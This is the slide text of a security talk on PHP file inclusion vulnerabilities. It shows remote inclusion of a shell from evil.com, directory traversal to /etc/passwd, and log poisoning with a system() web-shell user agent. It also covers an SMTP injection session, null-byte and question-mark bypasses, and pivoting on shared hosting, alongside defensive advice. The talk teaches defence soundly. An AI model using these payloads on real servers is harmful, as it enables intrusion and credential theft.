Tim Strijdhorst - Team THC - Inclusion Vulnerabilities 1 Speaker: Tim Strijdhorst Group: TeamTHC...

Tim Strijdhorst - Team THC - Inclusion Vulnerabilities

1

Speaker: Tim StrijdhorstGroup: TeamTHC

File Inclusion Vulnerabilities


2

Disclaimer

The author of this talk is not responsbile for what you do with this information.

If you go out there and be a scriptkiddie, it's not only illegal it's also pretty lame.


3

Introduction

This talk handles:

PHP Apache Linux MySQL

It uses standard configuration (locations can differ from server to server)

All the theory can be applied to all sorts of software

So you are all but safe if you use windows with ASP and IIS


4

What is an inclusion vulnerability?

Based on userinput

As with SQL Injection, the developer is too trusting or too stupid.

Code often includes/imports other pages

Because of the size of the codefiles and proper design

Dynamic including is where it goes wrong

**YOU HAVE TO FILTER USER INPUT**


5

What is user input?

A lot of stuff, some you wouldn't expect: GET data (url variables) POST data Header data (user agent?) Cookies (just clientside textfiles) XMLHTTPRequests (ajax)

THE USER IS NOT TO BE TRUSTED


6

Definition of inclusion vulnerability

2 types of inclusion vulns:

Local File Inclusion (LFI) Remote File Inclusion (RFI)

Less common these days Needs >PHP 5.2 or a really retarded php.ini A lot of webhosts still use PHP 4 though

One of the easiest ways to lose your server


7

Example code

Index.php:<?phpinclude($_GET['page']);?>

test.html:<html><head><title>Example</title></head><body>This is an example of an included HTML page</body></html>

Developer intended use:http://localhost/index.php?page=test.html

Outputs the content of test.html

What's the vulnerability here?

http://localhost/index.php?page=test.html


8

Vulnerability explained

Lets say the php version is 4.3

Vulnerable for both remote and local inclusion

Lets say our input is:

http://localhost/index.php?page=http://www.google.com

Code would be:

<?php

Include(“http://www.google.com”);

?>

Which is completely valid PHP code (given the above circumstances)

http://www.google.com/


9

Vulnerability explained

Lets say our input is:http://localhost/index.php?page=otherfile.txt

Code would be:<?phpinclude(“otherfile.txt”);?>

Still very valid PHP code that outputs the content of otherfile.txt


10

Why is this so awesome?


11

Basic exploitation of RFI

PHP shell (most popular out there is c99shell)

Lets say it's stored at http://evil.com/shell.txt (contains the code)

Lets say our input is:

http://localhost/index.php?page=http://evil.com/shell.txt

PHP will include the shell.txt and execute my code


12

The server is ours


13

Basic exploitation of LFI

Almost every PHP app has a config file

Most likely the almighty config.php This mostly includes the database credentials

Example:

<?php$CONFIG['database']['hostname'] = 'localhost';$CONFIG['database']['username'] = 'root';$CONFIG['database']['password'] = 'secret';$CONFIG['database']['database'] = 'lolwut';?>

Most applications: acces to database → administrator


14

Basic exploitation of LFI

This can also be used for:

Other functions (require,fopen,etc) Reading all non-php files (password files maybe?) Reading code

If it doesn't use include() but actually outputs the file highlight_file for example


15

Advanced LFI Tricks

Using directory traversal to read files

Injecting code into logs

Injecting code into session variables

Injecting code into environmental variables

Injecting code into other files

Injecting code into mail

Shared hosting


16

Basic UNIX background

Your current directory: /home/tim/

Name for current directory is '.'

Like: './lol.sh' to execute the lol.sh script inside /home/tim/

Name for parent directory is '..'

Like: '../lol.sh' to execute the lol.sh script inside /home/ But also: 'cat ../../etc/passwd' will work just fine


17

Using directory traversal

Website is located at: /var/www/public/index.php

It seems like we can only read stuff from /var/www/public/

Wrong, use the default unix parent-dir name '..'

For instance: http://localhost/index.php?page=../../../etc/passwd

root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/sh........


18


Some information about apache access.log:

Example location: /var/log/apache2/access.log It logs all the get requests This includes used directory and user agent

A user agent is also user input since it's a spoofable header

The webserver can read it, if it's configured that way

99% of the time, this is the case Example (trimmed):

"GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Firefox/3.5.8”


19


Use an user agent like:

<?system($_GET['c']);?> //arbitrary command execution Log entry looks like this:

"GET /index.php HTTP/1.1" 200 2807 "http://localhost/" "<?system($_GET['c']);?>”

Example exploit:

http://localhost/index.php?page=../../log/apache2/access.log&c=cat /etc/passwd

Tadaa, another server is yours <(^_^<) <( ^_^ )> (>^_^)>

http://localhost/index.php?page=../../log/apache2/access.log&c=cat


20

Injecting code into session variables

By default sessions are located in

/tmp/sess_%{phpsessionid} If you can inject information into a session variable

This will be saved in the sessionfile

You can find the sessionid in your cookies

Include this file and you will be able to inject code

<?phpstart_session();$_SESSION['lol'] = $_POST['userinput'];?>


21

Injecting code into environmental variables

Every process has process entry in /proc directory /proc/self references process directory of accessing

process /proc/self/environ holds environmental variables of the

process, in the case of apache, this includes the user agent, which we can inject code into

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin

[email protected]

...

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=300


22

Injecting code into other files

Some websites offer image uploads (Avatars,photo gallery,etc) which aren't checked properly (file extension,mime type)

We can construct a valid .jpeg which contains php code in it's metadata

this will bypass any image validation check and get uploaded

hopefully to a predictable location

We can then include this file in our LFI attack to execute PHP code

There are many more ways to upload files

FTP, badly written uploadpages etc etc

Every single one of them can be a way in


23


There are three ways to abuse email:

First of all we might send an e-mail to a user on the target server (Ie. [email protected]) and then attempt to include /var/spool/mail/tim. But this will only work on very badly configured out-of-date servers

The second method would be to include /var/log/maillog and then proceed to connect to port 25:

root@h4xb0x:/# telnet target.com 25

Connected to target.com.

220 hidden.domain.com ESMTP

HELO

250 hidden.domain.com

MAIL FROM: h4x0r < ?phpinfo();? >

250 ok

RCPT TO: [email protected]

250 ok

DATA

354 go ahead

Subject: pwnage.

250 ok 1186501618 qp 7063

quit

mailto:[email protected]


24


The third method would be to send an e-mail to and existing user, assuming our target server runs a mail server, and attempt to include the mail-file

We would contain our PHP code in our e-mail and then proceed to include the file associated with our email

The standard qmail format (for example) is: /var/qmail/mailnames/[targetdomain.com]/[targetuser]/Maildir/new/

The filename format will be: <UNIX Timestamp>.<PID>.server.domain.com

We could then proceed to bruteforce the timestamp starting at an educated guess

We could attempt to determine the PID by information in /proc/self or we could bruteforce it

This attack is quite hard and not likely to succeed and should be considered a last resort as it's bound to make a lot of 'noise' on the server


25

Shared Hosting

Shared hosting

Multiple websites on 1 server (using VirtualHosts) Most cheap webhosting is shared hosting Free hosts is almost always shared hosting (and a good target)

Problem? If you are super secure, but your IP neighbour is sloppy you can have

a serious problem.


26

Shared Hosting

You want to hack alice.com

You can't it's super secure

You find bob.com which is on the same server

Bob has a inclusion vulnerability After pwning bob we can have more or less two situations:

The server rights are badly configured and we can access alice.com's files

The server's rights are properly configured but we can execute a privilege-escalation attack (local kernel exploit, for example)

alice.com is now yours too :)


27

Defending yourself

Filter user input

Example:

Wrong again (we'll see why shortly)

First strip away everything not alpha-numeric

Example: $page = preg_replace("/[^a-z0-9.]+/i", "", $page);

Who uses non-alpha-numeric chars in a filename anyway?

<?php$page = $_GET['page'].'.html'; //forces the .html filetypeinclude($page);?>


28

Defending yourself

Properly configure your box, this includes:

PHP (php.ini or safe_mode) Apache Operating System (access modes?) Proper rights management Apply basedir restrictions!

If you configure the server properly, damage can be controlled

even if someone manages to exploit you.

safe_mode will be gone in PHP6 though, so you better config it right


29

Defeating the defense

Does this really force the .html filetype?

Nope, there are 2 ways to circumvent it:

Nullbyte injection Questionmark injection

<?php$page = $_GET['page'].'.html'; //forces the .html filetypeinclude($page);?>


30

Nullbyte injection

Nullbyte, line-end character in C-strings

\0 or %00 in character encoded hex http://localhost/index.php?page=config.php%00

$page == 'config.php%00.html'

PHP parser doesn't care about nullbytes in strings

PHP parser itself is written is written in C and that's another story

This works for a lot of other things too

<?php$page = $_GET['page'].'.php'; //forces the .php filetypeinclude($page);?>


31

Questionmark Injection

This only works for remote inclusion

http://localhost/index.php?page=http://evil.com/shell.txt?

$page == 'http://evil.com/shell.txt?.php'

'?' is used for variabled (index.php?page=)

PHP thinks '.php' is variable

So it loads http://evil.com/shell.txt

<?php$page = $_GET['page'].'.php'; //forces the .php filetypeinclude($page);?>


32

The point to all this?

You can't trust your users

It could be your grandmother or a hacker, you just don't know.


33

References

http://en.wikipedia.org/wiki/Null_character#Security_exploit:_Poison_null_byte

http://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/

http://www.phpfreaks.com/tutorial/php-security

http://insecurity.nl/?strInsecurity_Component=article&intArticle_ID=2

http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/

http://www.ush.it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/

http://en.wikipedia.org/wiki/Null_character#Security_exploit:_Poison_null_byte

http://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/

http://www.phpfreaks.com/tutorial/php-security

http://insecurity.nl/?strInsecurity_Component=article&intArticle_ID=2

http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/

http://www.ush.it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/


34

http://avatar-dev.tsl.utwente.nl

Questions?

http://avatar-dev.tsl.utwente.nl/

Tim Strijdhorst - Team THC - Inclusion Vulnerabilities 1 Speaker: Tim Strijdhorst Group: TeamTHC...

Documents

Transcript of Tim Strijdhorst - Team THC - Inclusion Vulnerabilities 1 Speaker: Tim Strijdhorst Group: TeamTHC...